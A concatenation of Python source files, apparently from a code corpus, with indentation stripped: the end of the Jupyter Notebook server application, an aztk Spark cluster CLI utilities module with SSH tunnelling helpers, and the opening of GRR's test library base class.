self.log.warning(_("Permission to listen on port %i denied.") % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
if self.port_retries:
self.log.critical(_('ERROR: the notebook server could not be started because '
'no available port could be found.'))
else:
self.log.critical(_('ERROR: the notebook server could not be started because '
'port %i is not available.') % port)
self.exit(1)
return success
def _concat_token(self, url):
token = self.token if self._token_generated else '...'
return url_concat(url, {'token': token})
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
elif self.sock:
url = self._unix_sock_url()
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._tcp_url(ip)
if self.token and not self.sock:
url = self._concat_token(url)
if not self.custom_display_url:
url += '\n or %s' % self._concat_token(self._tcp_url('127.0.0.1'))
return url
@property
def connection_url(self):
if self.sock:
return self._unix_sock_url()
else:
ip = self.ip if self.ip else 'localhost'
return self._tcp_url(ip)
def _unix_sock_url(self, token=None):
return '%s%s' % (urlencode_unix_socket(self.sock), self.base_url)
def _tcp_url(self, ip, port=None):
proto = 'https' if self.certfile else 'http'
return "%s://%s:%i%s" % (proto, ip, port or self.port, self.base_url)
def init_terminals(self):
if not self.terminals_enabled:
return
try:
from .terminal import initialize
initialize(nb_app=self)
self.terminals_available = True
except ImportError as e:
self.log.warning(_("Terminals not available (error was %s)"), e)
def init_signal(self):
if not sys.platform.startswith('win') and sys.stdin and sys.stdin.isatty():
signal.signal(signal.SIGINT, self._handle_sigint)
signal.signal(signal.SIGTERM, self._signal_stop)
if hasattr(signal, 'SIGUSR1'):
# Windows doesn't support SIGUSR1
signal.signal(signal.SIGUSR1, self._signal_info)
if hasattr(signal, 'SIGINFO'):
# only on BSD-based systems
signal.signal(signal.SIGINFO, self._signal_info)
def _handle_sigint(self, sig, frame):
"""SIGINT handler spawns confirmation dialog"""
# register more forceful signal handler for ^C^C case
signal.signal(signal.SIGINT, self._signal_stop)
# request confirmation dialog in bg thread, to avoid
# blocking the App
thread = threading.Thread(target=self._confirm_exit)
thread.daemon = True
thread.start()
def _restore_sigint_handler(self):
"""callback for restoring original SIGINT handler"""
signal.signal(signal.SIGINT, self._handle_sigint)
def _confirm_exit(self):
"""confirm shutdown on ^C
A second ^C, or answering 'y' within 5s will cause shutdown,
otherwise original SIGINT handler will be restored.
This doesn't work on Windows.
"""
info = self.log.info
info(_('interrupted'))
print(self.notebook_info())
yes = _('y')
no = _('n')
sys.stdout.write(_("Shutdown this notebook server (%s/[%s])? ") % (yes, no))
sys.stdout.flush()
r,w,x = select.select([sys.stdin], [], [], 5)
if r:
line = sys.stdin.readline()
if line.lower().startswith(yes) and no not in line.lower():
self.log.critical(_("Shutdown confirmed"))
# schedule stop on the main thread,
# since this might be called from a signal handler
self.io_loop.add_callback_from_signal(self.io_loop.stop)
return
else:
print(_("No answer for 5s:"), end=' ')
print(_("resuming operation..."))
# no answer, or answer is no:
# set it back to original SIGINT handler
# use IOLoop.add_callback because signal.signal must be called
# from main thread
self.io_loop.add_callback_from_signal(self._restore_sigint_handler)
def _signal_stop(self, sig, frame):
self.log.critical(_("received signal %s, stopping"), sig)
self.io_loop.add_callback_from_signal(self.io_loop.stop)
def _signal_info(self, sig, frame):
print(self.notebook_info())
def init_components(self):
"""Check the components submodule, and warn if it's unclean"""
# TODO: this should still check, but now we use bower, not git submodule
pass
def init_server_extension_config(self):
"""Consolidate server extensions specified by all configs.
The resulting list is stored on self.nbserver_extensions and updates config object.
The extension API is experimental, and may change in future releases.
"""
# TODO: Remove me in notebook 5.0
for modulename in self.server_extensions:
# Don't override disable state of the extension if it already exist
# in the new traitlet
if not modulename in self.nbserver_extensions:
self.nbserver_extensions[modulename] = True
# Load server extensions with ConfigManager.
# This enables merging on keys, which we want for extension enabling.
# Regular config loading only merges at the class level,
# so each level (user > env > system) clobbers the previous.
config_path = jupyter_config_path()
if self.config_dir not in config_path:
# add self.config_dir to the front, if set manually
config_path.insert(0, self.config_dir)
manager = ConfigManager(read_config_path=config_path)
section = manager.get(self.config_file_name)
extensions = section.get('NotebookApp', {}).get('nbserver_extensions', {})
for modulename, enabled in sorted(extensions.items()):
if modulename not in self.nbserver_extensions:
self.config.NotebookApp.nbserver_extensions.update({modulename: enabled})
self.nbserver_extensions.update({modulename: enabled})
def init_server_extensions(self):
"""Load any extensions specified by config.
Import the module, then call the load_jupyter_server_extension function,
if one exists.
The extension API is experimental, and may change in future releases.
"""
for modulename, enabled in sorted(self.nbserver_extensions.items()):
if enabled:
try:
mod = importlib.import_module(modulename)
func = getattr(mod, 'load_jupyter_server_extension', None)
if func is not None:
func(self)
except Exception:
if self.reraise_server_extension_failures:
raise
self.log.warning(_("Error loading server extension %s"), modulename,
exc_info=True)
def init_mime_overrides(self):
# On some Windows machines, an application has registered incorrect
# mimetypes in the registry.
# Tornado uses this when serving .css and .js files, causing browsers to
# reject these files. We know the mimetype always needs to be text/css for css
# and application/javascript for JS, so we override it here
# and explicitly tell the mimetypes to not trust the Windows registry
if os.name == 'nt':
# do not trust windows registry, which regularly has bad info
mimetypes.init(files=[])
# ensure css, js are correct, which are required for pages to function
mimetypes.add_type('text/css', '.css')
mimetypes.add_type('application/javascript', '.js')
# for python <3.8
mimetypes.add_type('application/wasm', '.wasm')
def shutdown_no_activity(self):
"""Shutdown server on timeout when there are no kernels or terminals."""
km = self.kernel_manager
if len(km) != 0:
return # Kernels still running
if self.terminals_available:
term_mgr = self.web_app.settings['terminal_manager']
if term_mgr.terminals:
return # Terminals still running
seconds_since_active = \
(utcnow() - self.web_app.last_activity()).total_seconds()
self.log.debug("No activity for %d seconds.",
seconds_since_active)
if seconds_since_active > self.shutdown_no_activity_timeout:
self.log.info("No kernels or terminals for %d seconds; shutting down.",
seconds_since_active)
self.stop()
def init_shutdown_no_activity(self):
if self.shutdown_no_activity_timeout > 0:
self.log.info("Will shut down after %d seconds with no kernels or terminals.",
self.shutdown_no_activity_timeout)
pc = ioloop.PeriodicCallback(self.shutdown_no_activity, 60000)
pc.start()
def _init_asyncio_patch(self):
"""set default asyncio policy to be compatible with tornado
Tornado <6.1 is not compatible with the default
asyncio implementation on Windows
Pick the older SelectorEventLoopPolicy on Windows
if the known-incompatible default policy is in use.
do this as early as possible to make it a low priority and overrideable
ref: https://github.com/tornadoweb/tornado/issues/2608
FIXME: if/when tornado supports the defaults in asyncio,
remove and bump tornado requirement for py38
"""
if sys.platform.startswith("win") and sys.version_info >= (3, 8) and tornado.version_info < (6, 1):
import asyncio
try:
from asyncio import (
WindowsProactorEventLoopPolicy,
WindowsSelectorEventLoopPolicy,
)
except ImportError:
pass
# not affected
else:
if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())
@catch_config_error
def initialize(self, argv=None):
self._init_asyncio_patch()
super().initialize(argv)
self.init_logging()
if self._dispatching:
return
self.init_resources()
self.init_configurables()
self.init_server_extension_config()
self.init_components()
self.init_webapp()
self.init_terminals()
self.init_signal()
self.init_server_extensions()
self.init_mime_overrides()
self.init_shutdown_no_activity()
def cleanup_kernels(self):
"""Shutdown all kernels.
The kernels will shutdown themselves when this process no longer exists,
but explicit shutdown allows the KernelManagers to cleanup the connection files.
"""
n_kernels = len(self.kernel_manager.list_kernel_ids())
kernel_msg = trans.ngettext('Shutting down %d kernel', 'Shutting down %d kernels', n_kernels)
self.log.info(kernel_msg % n_kernels)
run_sync(self.kernel_manager.shutdown_all())
def cleanup_terminals(self):
"""Shutdown all terminals.
The terminals will shutdown themselves when this process no longer exists,
but explicit shutdown allows the TerminalManager to cleanup.
"""
if not self.terminals_available:
return
terminal_manager = self.web_app.settings['terminal_manager']
n_terminals = len(terminal_manager.list())
terminal_msg = trans.ngettext('Shutting down %d terminal', 'Shutting down %d terminals', n_terminals)
self.log.info(terminal_msg % n_terminals)
run_sync(terminal_manager.terminate_all())
def notebook_info(self, kernel_count=True):
"Return the current working directory and the server url information"
info = self.contents_manager.info_string() + "\n"
if kernel_count:
n_kernels = len(self.kernel_manager.list_kernel_ids())
kernel_msg = trans.ngettext("%d active kernel", "%d active kernels", n_kernels)
info += kernel_msg % n_kernels
info += "\n"
# Format the info so that the URL fits on a single line in 80 char display
info += _("Jupyter Notebook {version} is running at:\n{url}".
format(version=NotebookApp.version, url=self.display_url))
if self.gateway_config.gateway_enabled:
info += _("\nKernels will be managed by the Gateway server running at:\n%s") % self.gateway_config.url
return info
def server_info(self):
"""Return a JSONable dict of information about this server."""
return {'url': self.connection_url,
'hostname': self.ip if self.ip else 'localhost',
'port': self.port,
'sock': self.sock,
'secure': bool(self.certfile),
'base_url': self.base_url,
'token': self.token,
'notebook_dir': os.path.abspath(self.notebook_dir),
'password': bool(self.password),
'pid': os.getpid(),
}
def write_server_info_file(self):
"""Write the result of server_info() to the JSON file info_file."""
try:
with open(self.info_file, 'w') as f:
json.dump(self.server_info(), f, indent=2, sort_keys=True)
except OSError as e:
self.log.error(_("Failed to write server-info to %s: %s"),
self.info_file, e)
def remove_server_info_file(self):
"""Remove the nbserver-<pid>.json file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.info_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def write_browser_open_file(self):
"""Write an nbserver-<pid>-open.html file
This can be used to open the notebook in a browser
"""
# default_url contains base_url, but so does connection_url
open_url = self.default_url[len(self.base_url):]
with open(self.browser_open_file, 'w', encoding='utf-8') as f:
self._write_browser_open_file(open_url, f)
def _write_browser_open_file(self, url, fh):
if self.token:
url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, url)
jinja2_env = self.web_app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(open_url=url))
def remove_browser_open_file(self):
"""Remove the nbserver-<pid>-open.html file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.browser_open_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
if not self.use_redirect_file:
uri = self.default_url[len(self.base_url):]
if self.token:
uri = url_concat(uri, {'token': self.token})
if self.file_to_run:
if not os.path.exists(self.file_to_run):
self.log.critical(_("%s does not exist") % self.file_to_run)
self.exit(1)
relpath = os.path.relpath(self.file_to_run, self.notebook_dir)
uri = url_escape(url_path_join('notebooks', *relpath.split(os.sep)))
# Write a temporary file to open in the browser
fd, open_file = tempfile.mkstemp(suffix='.html')
with open(fd, 'w', encoding='utf-8') as fh:
self._write_browser_open_file(uri, fh)
else:
open_file = self.browser_open_file
if self.use_redirect_file:
assembled_url = urljoin('file:', pathname2url(open_file))
else:
assembled_url = url_path_join(self.connection_url, uri)
b = lambda: browser.open(assembled_url, new=self.webbrowser_open_new)
threading.Thread(target=b).start()
def start(self):
""" Start the Notebook server app, after initialization
This method takes no arguments so all configuration and initialization
must be done prior to calling this method."""
super().start()
if not self.allow_root:
# check if we are running as root, and abort if it's not allowed
try:
uid = os.geteuid()
except AttributeError:
uid = -1 # anything nonzero here, since we can't check UID assume non-root
if uid == 0:
self.log.critical(_("Running as root is not recommended. Use --allow-root to bypass."))
self.exit(1)
info = self.log.info
for line in self.notebook_info(kernel_count=False).split("\n"):
info(line)
info(_("Use Control-C to stop this server and shut down all kernels (twice to skip confirmation)."))
if 'dev' in notebook.__version__:
info(_("Welcome to Project Jupyter! Explore the various tools available"
" and their corresponding documentation. If you are interested"
" in contributing to the platform, please visit the community"
"resources section at https://jupyter.org/community.html."))
self.write_server_info_file()
self.write_browser_open_file()
if (self.open_browser or self.file_to_run) and not self.sock:
self.launch_browser()
if self.token and self._token_generated:
# log full URL with generated token, so there's a copy/pasteable link
# with auth info.
if self.sock:
self.log.critical('\n'.join([
'\n',
'Notebook is listening on %s' % self.display_url,
'',
(
'UNIX sockets are not browser-connectable, but you can tunnel to '
'the instance via e.g.`ssh -L 8888:%s -N user@this_host` and then '
'open e.g. %s in a browser.'
) % (self.sock, self._concat_token(self._tcp_url('localhost', 8888)))
]))
else:
if not self.custom_display_url:
self.log.critical('\n'.join([
'\n',
'To access the notebook, open this file in a browser:',
' %s' % urljoin('file:', pathname2url(self.browser_open_file)),
'Or copy and paste one of these URLs:',
' %s' % self.display_url,
]))
else:
self.log.critical('\n'.join([
'\n',
'To access the notebook, open this file in a browser:',
' %s' % urljoin('file:', pathname2url(self.browser_open_file)),
'Or copy and paste this URL:',
' %s' % self.display_url,
]))
self.io_loop = ioloop.IOLoop.current()
if sys.platform.startswith('win'):
# add no-op to wake every 5s
# to handle signals that may be ignored by the inner loop
pc = ioloop.PeriodicCallback(lambda : None, 5000)
pc.start()
try:
self.io_loop.start()
except KeyboardInterrupt:
info(_("Interrupted..."))
finally:
self.remove_server_info_file()
self.remove_browser_open_file()
self.cleanup_kernels()
self.cleanup_terminals()
def stop(self):
def _stop():
self.http_server.stop()
self.io_loop.stop()
self.io_loop.add_callback(_stop)
def list_running_servers(runtime_dir=None):
"""Iterate over the server info files of running notebook servers.
Given a runtime directory, find nbserver-* files in the security directory,
and yield dicts of their information, each one pertaining to
a currently running notebook server instance.
"""
if runtime_dir is None:
runtime_dir = jupyter_runtime_dir()
# The runtime dir might not exist
if not os.path.isdir(runtime_dir):
return
for file_name in os.listdir(runtime_dir):
if re.match('nbserver-(.+).json', file_name):
with io.open(os.path.join(runtime_dir, file_name), encoding='utf-8') as f:
info = json.load(f)
# Simple check whether that process is really still running
# Also remove leftover files from IPython 2.x without a pid field
if ('pid' in info) and check_pid(info['pid']):
yield info
else:
# If the process has died, try to delete its info file
try:
os.unlink(os.path.join(runtime_dir, file_name))
except OSError:
pass # TODO: This should warn or log or something
#-----------------------------------------------------------------------------
# Main entry point
#-----------------------------------------------------------------------------
main = launch_new_instance = NotebookApp.launch_instance
|
utils.py
|
import datetime
import getpass
import subprocess
import sys
import threading
import time
from typing import List
import azure.batch.models as batch_models
from aztk import error, utils
from aztk.models import ClusterConfiguration
from aztk.spark import models
from aztk.spark.models import ApplicationState, JobState
from aztk.utils import get_ssh_key
from . import log
def get_ssh_key_or_prompt(ssh_key, username, password, secrets_configuration):
ssh_key = get_ssh_key.get_user_public_key(ssh_key, secrets_configuration)
if username is not None and password is None and ssh_key is None:
log.warning("It is recommended to use an SSH key for user creation instead of a password.")
for i in range(3):
if i > 0:
log.error("Please try again.")
password = getpass.getpass("Please input a password for user '{0}': ".format(username))
confirm_password = getpass.getpass("Please confirm your password for user '{0}': ".format(username))
if password != confirm_password:
log.error("Password confirmation did not match.")
elif not password:
log.error("Password cannot be empty.")
else:
break
else:
raise error.AztkError(
"Failed to get valid password, cannot add user to cluster. "
"It is recommended that you provide a ssh public key in .aztk/secrets.yaml. "
"Or provide an ssh-key or password with command line parameters (--ssh-key or --password). "
"You may also run the 'aztk spark cluster add-user' command to add a user to this cluster.")
return ssh_key, password
def format_datetime(datetime, include_seconds=True):
format = '%Y-%m-%d %H:%M' + (':%S' if include_seconds else '')
return datetime.strftime(format)
def print_cluster(client, cluster: models.Cluster, internal: bool = False):
node_count = __pretty_node_count(cluster)
log.info("")
log.info("Cluster %s", cluster.id)
log.info("------------------------------------------")
log.info("State: %s", cluster.state.value)
log.info("Node Size: %s", cluster.vm_size)
log.info("Created: %s", format_datetime(cluster.pool.creation_time))
log.info("Nodes: %s", node_count)
log.info("| Dedicated: %s", __pretty_dedicated_node_count(cluster))
log.info("| Low priority: %s", __pretty_low_pri_node_count(cluster))
log.info("")
print_format = "|{:^36}| {:^19} | {:^21}| {:^10} | {:^8} |"
print_format_underline = "|{:-^36}|{:-^21}|{:-^22}|{:-^12}|{:-^10}|"
if internal:
log.info(print_format.format("Nodes", "State", "IP", "Dedicated", "Master"))
else:
log.info(print_format.format("Nodes", "State", "IP:Port", "Dedicated", "Master"))
log.info(print_format_underline.format("", "", "", "", ""))
if not cluster.nodes:
return
for node in cluster.nodes:
remote_login_settings = client.cluster.get_remote_login_settings(cluster.id, node.id)
if internal:
ip = node.ip_address
else:
ip = "{}:{}".format(remote_login_settings.ip_address, remote_login_settings.port)
log.info(
print_format.format(
node.id,
node.state.value,
ip,
"*" if node.is_dedicated else "",
"*" if node.id == cluster.master_node_id else "",
))
log.info("")
def __pretty_node_count(cluster: models.Cluster) -> str:
if cluster.pool.allocation_state is batch_models.AllocationState.resizing:
return "{} -> {}".format(cluster.total_current_nodes, cluster.total_target_nodes)
else:
return "{}".format(cluster.total_current_nodes)
def __pretty_dedicated_node_count(cluster: models.Cluster) -> str:
if (cluster.pool.allocation_state is batch_models.AllocationState.resizing or cluster.pool.state is
batch_models.PoolState.deleting) and cluster.current_dedicated_nodes != cluster.target_dedicated_nodes:
return "{} -> {}".format(cluster.current_dedicated_nodes, cluster.target_dedicated_nodes)
else:
return "{}".format(cluster.current_dedicated_nodes)
def __pretty_low_pri_node_count(cluster: models.Cluster) -> str:
if (cluster.pool.allocation_state is batch_models.AllocationState.resizing or cluster.pool.state is
batch_models.PoolState.deleting) and cluster.current_low_pri_nodes != cluster.target_low_pri_nodes:
return "{} -> {}".format(cluster.current_low_pri_nodes, cluster.target_low_pri_nodes)
else:
return "{}".format(cluster.current_low_pri_nodes)
def print_clusters(clusters: List[models.Cluster]):
print_format = "{:<34}| {:<10}| {:<20}| {:<7}| {:<16}"
print_format_underline = "{:-<34}|{:-<11}|{:-<21}|{:-<8}|{:-<17}"
log.info(print_format.format("Cluster", "State", "VM Size", "Nodes", "Created"))
log.info(print_format_underline.format("", "", "", "", ""))
for cluster in clusters:
node_count = __pretty_node_count(cluster)
log.info(
print_format.format(cluster.id, cluster.state.value, cluster.vm_size, node_count,
format_datetime(cluster.pool.creation_time, False)))
def print_clusters_quiet(clusters: List[models.Cluster]):
log.print("\n".join([str(cluster.id) for cluster in clusters]))
def stream_logs(client, cluster_id, application_name):
current_bytes = 0
while True:
app_logs = client.cluster.get_application_log(
id=cluster_id, application_name=application_name, tail=True, current_bytes=current_bytes)
log.print(app_logs.log)
if app_logs.application_state == ApplicationState.Completed:
return app_logs.exit_code
current_bytes = app_logs.total_bytes
time.sleep(3)
def ssh_in_master(
client,
cluster_id: str,
cluster_configuration: models.ClusterConfiguration,
username: str = None,
webui: str = None,
jobui: str = None,
jobhistoryui: str = None,
ports=None,
host: bool = False,
connect: bool = True,
internal: bool = False,
):
"""
SSH into head node of spark-app
:param cluster_id: Id of the cluster to ssh in
:param username: Username to use to ssh
:param webui: Port for the spark master web ui (Local port)
:param jobui: Port for the job web ui (Local port)
:param ports: an list of local and remote ports
:type ports: [[<local-port>, <remote-port>]]
"""
# check if ssh is available, this throws OSError if ssh is not present
subprocess.call(["ssh"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Get master node id from task (job and task are both named pool_id)
cluster = client.cluster.get(cluster_id)
master_node_id = cluster.master_node_id
if master_node_id is None:
raise error.ClusterNotReadyError("Master node has not yet been picked!")
# get remote login settings for the user
remote_login_settings = client.cluster.get_remote_login_settings(cluster.id, master_node_id)
master_internal_node_ip = [node.ip_address for node in cluster.nodes if node.id == master_node_id][0]
master_node_ip = remote_login_settings.ip_address
master_node_port = remote_login_settings.port
spark_web_ui_port = utils.constants.DOCKER_SPARK_WEB_UI_PORT
spark_job_ui_port = utils.constants.DOCKER_SPARK_JOB_UI_PORT
spark_job_history_ui_port = utils.constants.DOCKER_SPARK_JOB_UI_HISTORY_PORT
ssh_command = utils.command_builder.CommandBuilder("ssh")
# get ssh private key path if specified
ssh_priv_key = client.secrets_configuration.ssh_priv_key
if ssh_priv_key is not None:
ssh_command.add_option("-i", ssh_priv_key)
ssh_command.add_argument("-t")
ssh_command.add_option("-L", "{0}:localhost:{1}".format(webui, spark_web_ui_port), enable=bool(webui))
ssh_command.add_option("-L", "{0}:localhost:{1}".format(jobui, spark_job_ui_port), enable=bool(jobui))
ssh_command.add_option(
"-L", "{0}:localhost:{1}".format(jobhistoryui, spark_job_history_ui_port), enable=bool(jobui))
if ports is not None:
for port in ports:
ssh_command.add_option("-L", "{0}:localhost:{1}".format(port[0], port[1]))
if cluster_configuration and cluster_configuration.plugins:
for plugin in cluster_configuration.plugins:
for port in plugin.ports:
if port.expose_publicly:
ssh_command.add_option("-L", "{0}:localhost:{1}".format(port.public_port, port.internal))
user = username if username is not None else "<username>"
if internal:
ssh_command.add_argument("{0}@{1}".format(user, master_internal_node_ip))
else:
ssh_command.add_argument("{0}@{1} -p {2}".format(user, master_node_ip, master_node_port))
if host is False:
ssh_command.add_argument("'sudo docker exec -it spark /bin/bash'")
command = ssh_command.to_str()
if connect:
subprocess.call(command, shell=True)
return "\n\t{}\n".format(command)
def print_batch_exception(batch_exception):
"""
Prints the contents of the specified Batch exception.
:param batch_exception:
"""
log.error("-------------------------------------------")
log.error("Exception encountered:")
if batch_exception.error and batch_exception.error.message and batch_exception.error.message.value:
log.error(batch_exception.error.message.value)
if batch_exception.error.values:
log.error("")
for mesg in batch_exception.error.values:
log.error("%s:\t%s", mesg.key, mesg.value)
log.error("-------------------------------------------")
def print_jobs(jobs: List[models.Job]):
print_format = "{:<34}| {:<10}| {:<20}"
print_format_underline = "{:-<34}|{:-<11}|{:-<21}"
log.info(print_format.format("Job", "State", "Creation Time"))
log.info(print_format_underline.format("", "", "", ""))
for job in jobs:
log.info(print_format.format(job.id, job.state.name, utc_to_local(job.creation_time)))
def print_job(client, job: models.Job):
print_format = "{:<36}| {:<15}"
log.info("")
log.info("Job %s", job.id)
log.info("------------------------------------------")
log.info("State: %s", job.state.name)
log.info("Transition Time: %s", utc_to_local(job.state_transition_time))
log.info("")
if job.cluster:
print_cluster_summary(job.cluster)
else:
if job.state == JobState.completed:
log.info("Cluster %s", "Job completed, cluster deallocated.")
log.info("")
else:
log.info(print_format.format("Cluster", "Provisioning"))
log.info("")
if job.applications:
application_summary(job.applications)
else:
application_summary(client.job.list_applications(job.id))
log.info("")
def node_state_count(cluster: models.Cluster):
states = {}
for node in cluster.nodes:
states[node.state] = states.get(node.state, 0) + 1
return states
def print_cluster_summary(cluster: models.Cluster):
log.info("Cluster %s", cluster.id)
log.info("-" * 42)
log.info("Nodes %s", __pretty_node_count(cluster))
log.info("| Dedicated: %s", __pretty_dedicated_node_count(cluster))
log.info("| Low priority: %s", __pretty_low_pri_node_count(cluster))
state_count = node_state_count(cluster)
if state_count:
log.info("| Node States:")
for state in state_count:
log.info("| \t%s: %d", state.name, state_count[state])
log.info("Master: %s", cluster.master_node_id or "Pending")
log.info("")
def application_summary(applications):
states = {"scheduling": 0}
for state in models.ApplicationState:
states[state] = 0
warn_scheduling = False
for application in applications:
if isinstance(application, str):
states["scheduling"] += 1
warn_scheduling = True
else:
states[application.state] += 1
print_format = "{:<17} {:<14}"
log.info("Applications")
log.info("-" * 42)
for state in states:
if states[state] > 0:
log.info(print_format.format(state.value + ":", states[state]))
if warn_scheduling:
log.warning("\nNo Spark applications will be scheduled until the master is selected.")
def print_applications(applications):
print_format = "{:<36}| {:<15}| {:<16} | {:^9} |"
print_format_underline = "{:-<36}|{:-<16}|{:-<18}|{:-<11}|"
log.info(print_format.format("Applications", "State", "Transition Time", "Exit Code"))
log.info(print_format_underline.format("", "", "", ""))
warn_scheduling = False
for name in applications:
if applications[name] is None:
log.info(print_format.format(name, "scheduling", "-", "-"))
warn_scheduling = True
else:
application = applications[name]
log.info(
print_format.format(
application.name,
application.state.value,
utc_to_local(application.state_transition_time),
application.exit_code if application.exit_code is not None else "-",
))
if warn_scheduling:
log.warning("\nNo Spark applications will be scheduled until the master is selected.")
def print_application(application: models.Application):
print_format = "{:<30}| {:<15}"
log.info("")
log.info("Application %s", application.name)
log.info("-" * 42)
log.info(print_format.format("State", application.state.value))
log.info(print_format.format("State transition time", utc_to_local(application.state_transition_time)))
log.info("")
class Spinner:
busy = False
delay = 0.1
@staticmethod
def spinning_cursor():
while 1:
for cursor in "|/-\\":
yield cursor
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay):
self.delay = delay
def __enter__(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
return self.stop()
def spinner_task(self):
while self.busy:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write("\b")
sys.stdout.flush()
def start(self):
self.busy = True
threading.Thread(target=self.spinner_task, daemon=True).start()
def stop(self):
self.busy = False
time.sleep(self.delay)
def utc_to_local(utc_dt):
return utc_dt.replace(tzinfo=datetime.timezone.utc).astimezone(tz=None).strftime("%H:%M%p %d/%m/%y")
def print_cluster_conf(cluster_conf: ClusterConfiguration, wait: bool):
user_configuration = cluster_conf.user_configuration
log.info("-------------------------------------------")
log.info("cluster id: %s", cluster_conf.cluster_id)
log.info("cluster toolkit: %s %s", cluster_conf.toolkit.software, cluster_conf.toolkit.version)
log.info("cluster size: %s", cluster_conf.size + cluster_conf.size_low_priority)
log.info("> dedicated: %s", cluster_conf.size)
log.info("> low priority: %s", cluster_conf.size_low_priority)
log.info("cluster vm size: %s", cluster_conf.vm_size)
log.info("subnet ID: %s", cluster_conf.subnet_id)
log.info("file shares: %s",
len(cluster_conf.file_shares) if cluster_conf.file_shares is not None else 0)
log.info("gpu enabled: %s", str(cluster_conf.gpu_enabled()))
log.info("docker repo name: %s", cluster_conf.get_docker_repo())
if cluster_conf.get_docker_run_options():
log.info("docker run options: %s", cluster_conf.get_docker_run_options())
log.info("wait for cluster: %s", wait)
if user_configuration:
log.info("username: %s", user_configuration.username)
if user_configuration.password:
log.info("Password: %s", "*" * len(user_configuration.password))
log.info("Plugins:")
if not cluster_conf.plugins:
log.info(" None Configured")
else:
for plugin in cluster_conf.plugins:
log.info(" - %s", plugin.name)
log.info("-------------------------------------------")
def log_property(label: str, value: str):
label += ":"
log.info("{0:30} {1}".format(label, value))
def log_node_copy_output(node_output):
log.info("-" * (len(node_output.id) + 4))
log.info("| %s |", node_output.id)
log.info("-" * (len(node_output.id) + 4))
if node_output.error:
log.error(node_output.error)
else:
log.print("Copy successful")
def log_node_run_output(node_output):
log.info("-" * (len(node_output.id) + 4))
log.info("| %s |", node_output.id)
log.info("-" * (len(node_output.id) + 4))
if node_output.error:
log.error("%s\n", node_output.error)
else:
log.print(node_output.output)
|
test_lib.py
|
#!/usr/bin/env python
"""A library for tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import datetime
import doctest
import email
import functools
import itertools
import logging
import os
import shutil
import threading
import time
import unittest
from absl.testing import absltest
import mock
import pkg_resources
from grr_response_core import config
from grr_response_core.lib import rdfvalue
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.rdfvalues import client_network as rdf_client_network
from grr_response_core.lib.rdfvalues import crypto as rdf_crypto
from grr_response_core.lib.util import cache
from grr_response_core.lib.util import compatibility
from grr_response_core.lib.util import precondition
from grr_response_core.lib.util import temp
from grr_response_core.stats import stats_collector_instance
from grr_response_server import access_control
from grr_response_server import client_index
from grr_response_server import data_store
from grr_response_server import email_alerts
from grr_response_server import prometheus_stats_collector
from grr_response_server.rdfvalues import objects as rdf_objects
from grr.test_lib import testing_startup
FIXED_TIME = rdfvalue.RDFDatetime.Now() - rdfvalue.Duration.From(
8, rdfvalue.DAYS)
TEST_CLIENT_ID = "C.1000000000000000"
class GRRBaseTest(absltest.TestCase):
"""This is the base class for all GRR tests."""
def __init__(self, methodName=None): # pylint: disable=g-bad-name
"""Hack around unittest's stupid constructor.
We sometimes need to instantiate the test suite without running any tests -
e.g. to start initialization or setUp() functions. The unittest constructor
requires to provide a valid method name.
Args:
methodName: The test method to run.
"""
super(GRRBaseTest, self).__init__(methodName=methodName or "__init__")
self.base_path = config.CONFIG["Test.data_dir"]
def setUp(self):
super(GRRBaseTest, self).setUp()
test_user = u"test"
system_users_patcher = mock.patch.object(
access_control, "SYSTEM_USERS",
frozenset(itertools.chain(access_control.SYSTEM_USERS, [test_user])))
system_users_patcher.start()
self.addCleanup(system_users_patcher.stop)
self.token = access_control.ACLToken(
username=test_user, reason="Running tests")
self.temp_dir = temp.TempDirPath()
config.CONFIG.SetWriteBack(os.path.join(self.temp_dir, "writeback.yaml"))
self.addCleanup(lambda: shutil.rmtree(self.temp_dir, ignore_errors=True))
# Each datastore is wrapped with DatabaseValidationWrapper, so we have
# to access the delegate directly (assuming it's an InMemoryDB
# implementation).
data_store.REL_DB.delegate.ClearTestDB()
email_alerts.InitializeEmailAlerterOnce()
# Stub out the email function
self.emails_sent = []
def SendEmailStub(to_user, from_user, subject, message, **unused_kwargs):
self.emails_sent.append((to_user, from_user, subject, message))
self.mail_stubber = utils.MultiStubber(
(email_alerts.EMAIL_ALERTER, "SendEmail", SendEmailStub),
(email.utils, "make_msgid", lambda: "<message id stub>"))
self.mail_stubber.Start()
self.addCleanup(self.mail_stubber.Stop)
# We don't want to send actual email in our tests
self.smtp_patcher = mock.patch("smtplib.SMTP")
self.mock_smtp = self.smtp_patcher.start()
self.addCleanup(self.smtp_patcher.stop)
def DisabledSet(*unused_args, **unused_kw):
raise NotImplementedError(
"Usage of Set() is disabled, please use a configoverrider in tests.")
self.config_set_disable = utils.Stubber(config.CONFIG, "Set", DisabledSet)
self.config_set_disable.Start()
self.addCleanup(self.config_set_disable.Stop)
self._SetupFakeStatsContext()
# Turn off WithLimitedCallFrequency-based caching in tests. Tests that need
# to test caching behavior explicitly, should turn it on explicitly.
with_limited_call_frequency_stubber = utils.Stubber(
cache, "WITH_LIMITED_CALL_FREQUENCY_PASS_THROUGH", True)
